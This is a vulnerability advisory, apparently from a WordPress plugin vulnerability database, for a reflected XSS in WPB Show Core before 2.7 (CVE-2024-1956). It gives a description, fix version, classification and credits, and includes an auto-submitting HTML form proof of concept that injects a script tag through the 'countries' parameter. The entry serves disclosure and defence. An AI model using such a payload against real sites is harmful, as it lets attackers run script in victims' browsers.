WordPress Plugin Vulnerabilities

WPB Show Core < 2.7 - Reflected XSS

Description

The plugin does not sanitise and escape the parameters before outputting it back in the response of an unauthenticated request, leading to a Reflected Cross-Site Scripting

Proof of Concept

Open an HTML file containing the following:

```
<html>
  <body>
    <form action="https://example.com/wp-content/plugins/wpb-show-core/auto-suggest-categories/subscribe.php" id="hack" method="POST">
      <input type="hidden" name="firstname" value="test" />
      <input type="hidden" name="lastname" value="test2" />    
      <input type="hidden" name="countries" value='xxxxxx"><script>alert(/XSS/)</script>' />
      <input type="submit" value="Submit request" />
    </form>
  </body>

  <script>
    var form1 = document.getElementById('hack');
    form1.submit();
</script>
</html>
```

Affects Plugins

Plugin icon
wpb-show-core
Fixed in 2.7

References

CVE
CVE-2024-1956

Classification

Type
XSS
OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79

Miscellaneous

Original Researcher
Bob Matyas
Submitter
Bob Matyas
Submitter website
https://www.bobmatyas.com
Submitter twitter
bobmatyas
Verified
Yes
WPVDB ID
d7034ac2-0098-48d2-9ba9-87e09b178f7d

Timeline

Publicly Published
2024-03-18 (about 1 months ago)
Added
2024-03-18 (about 1 months ago)
Last Updated
2024-03-18 (about 1 months ago)

Other

Published
Title
Published
2016-09-22
Title
Google Document Embedder < 2.6.1 - XSS
Published
2014-08-01
Title
Codilight Premium 1.0.0 - admin/front-end/options.php reset Parameter XSS
Published
2023-05-30
Title
Call Now Icon Animate <= 0.1.0 - Admin+ Stored XSS
Published
2024-04-26
Title
Getwid – Gutenberg Blocks < 2.0.8 - Authenticated (Contributor+) DOM-Based Stored Cross-Site Scripting via 'Countdown'
Published
2023-05-04
Title
Cart Lift < 3.1.6 - Reflected XSS